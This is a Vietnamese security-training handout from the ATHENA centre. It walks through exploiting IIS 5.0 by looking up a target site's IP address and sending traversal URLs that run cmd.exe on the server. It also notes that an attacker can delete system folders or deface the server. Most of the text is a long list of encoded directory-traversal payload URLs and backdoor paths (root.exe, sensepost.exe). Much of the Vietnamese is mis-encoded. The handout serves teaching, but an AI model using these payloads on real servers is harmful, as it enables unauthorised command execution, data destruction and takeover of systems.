This document describes how to exploit a vulnerability in Microsoft Windows IIS 5.0 web servers. It outlines the steps to determine the IP address of the target web server, craft URLs to exploit the vulnerability, and provides examples of common exploit URLs. The vulnerability allows executing commands remotely on the server, which could allow an attacker to delete important files or fully compromise the operating system. It affects IIS 5.0 servers prior to patches being released by Microsoft.

1. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 42
Bài 7:
TẤN CÔNG DỰA TRÊN LỖI IIS5.0
1. Giới thiệu:
Cách tấn công này dựa trên lỗi lập trình của hệ thống chạy web server của
Microsoft Windows IIS 5.0. Lỗi này đã được Microsoft khắc phục trong các phiên
bản về sau.
2. Các bước thực hiện như sau:
Böôùc 1:
Để thực hiện bài lap này cần phải có một server cài đặt hệ điều hành windows server
2000 và IIS 5.0
Ñaàu tieân ta caàn xaùc ñònh ñòa chæ IP cuûa web laø gì? Baèng caùch vaøo start -> run -> cmd :
Giaû söû muoán tìm ñòa chæ web :
www.daihocyduoc.edu.vn ta nhaäp:
C:>ping www.daihocyduoc.edu.vn
hay C:>nslookup www.daihocyduoc.edu.vn

2. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 43
ta seõ nhaän ñöôïc ñòa chæ IP cuûa website:www.daihocyduoc.edu.vn giaû söû
laø:192.168.1.34
Böôùc 2: Môû IE treân thanh address nhaäp 1 doøng leänh khai thaùc loãi IIS vaøo (raát nhieàu loãi
seõ ñöôïc lieät keâ ôû cuoái baøi vieát)
Sau doù ta coù theå thöïc hieän caùc thao taùc nhö ñang thöïc hieän treân cmd baèng caùch thay ñoåi
caùc leänh ôû cuoái . Ví duï:
…………………………………………………/c+md+test+c: ñeå taïo folder test.

3. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 44
………………………………………………../c+cd+winnt+c:vaøo folder winnt.
…………………………………………………………………………………………………………………………………………………Vaäy laø ta coù
theå delete caùc folder chính nhö winnt , inetpub………khieán cho web server bò treo vaø
neáu keû taán coâng coù aùc yù thì se deface luoân caû operating system.
Böôùc 3:Ñaây laø 1 soá loãi phoå bieán treân web server söû duïng IIS5.0.
Một số Url'slỗi mẫu:
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:

4. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 45
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/root.exe?/c+dir+c:
/scripts/eyehack.exe?/c+dir+c:
/scripts/sensepost.exe?/c+dir+c:
/iisadmpwd/root.exe?/c+dir+c:
/iisadmpwd/eyehack.exe?/c+dir+c:
/iisadmpwd/sensepost.exe?/c+dir+c:
/cgi-bin/root.exe?/c+dir+c:
/cgi-bin/eyehack.exe?/c+dir+c:
/cgi-bin/sensepost.exe?/c+dir+c:
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d
ir+c:
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
+c:

5. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 46
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+
dir+c:
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?
/c+dir+c:
6
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c
+dir+c:
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe
?/c+dir+c:
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c
:
/cgi-
bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
/cgi-

6. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 47
bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+
c:
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d
ir+c:
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
+c:
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+
dir+c:
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:

7. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 48
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?
/c+dir+c:
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c
+dir+c:
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe
?/c+dir+c:
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c
+dir+c:
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex
e?/c+dir+c:
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e

8. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 49
x?/c+dir+c:
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
+c:
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cm
d.exe?/c+dir+c:
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex
e?/c+dir+c:
7
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di
r+c:
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system

9. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 50
32/cmd.exe?/c+dir+c:
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../
winnt/system32/cmd.e
xe?/c+dir+c:
/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+
dir+c:
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+
dir+c:
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe
?/c+dir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+d

10. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 51
ir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe
?/c+dir+c:
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: